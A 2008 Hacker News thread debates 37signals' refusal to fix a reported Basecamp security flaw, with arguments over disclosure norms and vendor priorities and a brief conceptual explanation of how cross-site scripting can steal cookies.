Hacker News new | past | comments | ask | show | jobs | submit login
37Signals "just says no" to feature request: "please fix that security flaw" (matasano.com)
29 points by tptacek on June 26, 2008 | hide | past | favorite | 33 comments

I've gotten that "Soft No" from 37signals, too. I was reporting a bug in the BaseCamp example API and was told that maybe we just had different views of how the API should be designed. I guess I was the only one in the conversation with the view that it should return data instead of raise exceptions and crap out. I no longer use BaseCamp.

I find 37signals pretty stubborn when it comes to listening to its users, in general.

-just my 2 cents

We listen to everyone and 9 out of 10 things we add to our products start out as customer requests. We encourage feedback everywhere we can and interact with our customers as often as we can -- often by posting comments on their own blogs.

But, we also get thousands of requests a year so we can't do everything everyone wants. Many of these requests conflict with one another, and many of them just aren't a good fit for our products (adding Gantt charts to Basecamp, for example). The good ones, however, often make it into the products eventually. Sometimes exactly as requested, sometimes in a different form, but customer requests are almost always the seeds of improvement.

It is our job to be editors and museum curators. We have to decide what makes it and what doesn't for the benefit of the overall product and the overall customer base. No combination of yes or no is going to satisfy everyone, so we have to work on behalf of the majority.

Every company with millions of users has to say no more than they say yes, we're just honest and up front about it about it. We don't want to set false expectations or promise things we won't be able to deliver.

While this policy may rub some people the wrong way, we think it's the right policy. And seeing that 94%+ of our customers would recommend Basecamp to a friend or colleague, I think we're on the right track. http://basecamphq.com/survey

The issue here is not about adding new features, but fixing bugs and security issues.

Perhaps the 94% are not tech savvy enough to identify these problems?

Incidentally, I've read that specific example of adding Gantt charts to Basecamp before: http://www.37signals.com/svn/posts/1050-ask-37signals-how-do...

Very nicely worded. Now, can address the OP's concern about security flaws not being fixed? Is security flaw == to Gantt chart request?

The curators at the museums don't lock the doors and arm the alarms, Jason.

I'm surprised that so few Basecamp users would recommend it. 94% is not a good number, you have to take into account survivorship bias. The people who would not recommend your service have already stopped being your customers. 94% says that your churn rate is 6%.

I think they are trying to pretend that they know everything and that they never make mistakes. It's a good image to have, which is why they try so hard to get it.

Unfortunately, the result is customers that can't think for themselves. Anyone with a brain uses someone else's services.

Just post the vulnerability to a forum 14 days after notifying the company.

No. That's one of those ideas that sounds great on paper, and in the real world consistently fucks people over. At this point, by posting the vulnerability, we'd be violating our own code of conduct:


In this case, 37Signals has already been notified. They've been told about other flaws on public forums and not fixed them. What would we be accomplishing?

14 days after? Just disclose the vulnerability to bugtraq and be done with it. Whether the company follows up or not is up to them.

So you think the right plan is to punish the end-users and hope the vendor notices? Do you read Bugtraq? It's a mess.

This strategy works better. Several thousand people have already read Dave's article. We don't have to worry at all about the "wrong people" getting details and messing with other users. This seems like a win-win.

I think a company that goes: "OMG this is a serious vulnerability and there's lots of instances of it throughout the whole system but we'll fix ASAP!!" deserves a longer grace period than another that says: "SO WHAT man, our thing just works...".

Did he not mention the flaw, or did I miss it? If he didn't, I'd say this article is linkbait.

The bug is probably something really trivial that affects a small portion of users in an insignificant way. The secrecy about specifics on the author's part seems to be just to spare him embarrassment at this point.

I think the post itself is pretty clear on this score: it's not a major vulnerability. It doesn't prevent us from using the product. It does change the way we use the product.

I'm not sure Dave's too worried about what YC board people think about him, but if that makes you feel better, you can go ahead and keep thinking that.

Here's what I want to accomplish by posting this story on YC (and not Reddit, or anywhere else):

The 37Signals attitude towards feature requests is refreshing and powerful. But if you apply it mindlessly, like they themselves did in this case, you can cause problems for yourself. Not every request is really optional. Maybe this one was --- I'm on the fence leaning towards "they should probably fix this soon" --- but others truly won't be, because they will reveal customer information, lose data, or crash the system.

I think there's a lesson in here somewhere. Maybe it'll just have to wait for an actual incident at 37Signals.

I'm guessing it's this:


Suppose we're both basecamp users. It may be possible for me to steal your session by giving you a link to a shared calendar or something with malicious javascript. Or I can steal the login cookie of one of the admins by luring them to my website with a support request.

I don't think permitting XSS is a good idea in a shared environment.

Apparently they consider XSS a feature. That's a first!

Nope. That's not it.

You can steal cookies with XSS?

Yes. That's why XSS is such a serious security problem. And even if you can't steal cookies, you can still do nasty things like re-target the login form's action to point at your own server and hence steal people's passwords.

document.cookie, wow... Guess you learn something new every day. For those interested, this has a good explanation:


I'm gonna go against the grain on this one and call it karma whoring. Here's the formula:

1) Pick a company that has been the source of recent controversy.

2) Find a silly security flaw in one of their products that you can make sound serious with a bit of sensationalism. This should be easy to do, because most web apps have a few silly security holes.

3) Inform the company, and when they inevitably assign the silly flaw a low priority, write an inflammatory blog post and submit it to major news aggregators (e.g. news.yc)

I'm going to go exactly with the grain of all my previous comments here and call you full of it.

Did you read the post? We reported this over a year ago. We notified them repeatedly. We withheld the name of the vendor for over a year as a courtesy. They started with a "soft no", and, when Dave checked in a few months later, they simply ignored our email.

Also: 37Signals has nothing to do with the recent Ruby "controversy" (where by controversy, you mean "someone found security vulnerabilities in it, and some blogger freaked out about it"). 37Signals doesn't produce Ruby; an Open Source team does.

The issue here is that one of 37Signals signature philosophies is "just say no" and be true to your own vision of your product when users request things you don't want to do. Fine. But there's a slippery slope to that logic, and you need to be careful not to fall down it. Some requests that you don't want to do, especially when they come from paying customers, can't be blown off.

Security flaws are bugs. They should be prioritised along with the rest.

That's what 37Signals has done. They've simply put it at the bottom of their list, behind adjusting the pixel alignment of their sidebars.

And yet they're still making plenty of money. Security would be taken seriously if users gave a damn. But they don't.

Depends on who you're talking about. An XSS vulnerability in a web app will get you shelved at a Fortune 500 company. When new apps get deployed on customer DMZs, third party audits happen. When they find vulnerabilities, you spin dot releases. On a typical 4/2 dev/qa dev team, in the hopelessly optimistic case where you can turn a QA'd dot release in 2 weeks, you just lost $37,500.

I do. Look, most users cannot care about this vulnerability because they don't even know about it. Besides, most of them have a good reason not to understand the implications: it's not their job.

I think users deserve more respect even if they're incompetent out of their fields of competence.

It's really not a major flaw. But, I mean, come on.

Even if it is not a "major" bug, why has it taken more than a year to fix? Unless 37signals does not consider it to be significant?

"Unless 37signals does not consider it to be significant?"

That's the real disconnect here. It isn't that responding to secuity vulnerabilities needs a unique process, it's that the author considers this issue significant and 37Signals does not.

I doubt --- kind of a lot, actually --- that any actual developer there even saw our report.

[Edit] On second thought, this is a dumb thing to say, and I retract it. I have no idea if anyone's seen it, which is itself a problem. If I was going to assign a cause to this, it's that the cost of fixing this particular bug may exceed the perceived risk of the vulnerability.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact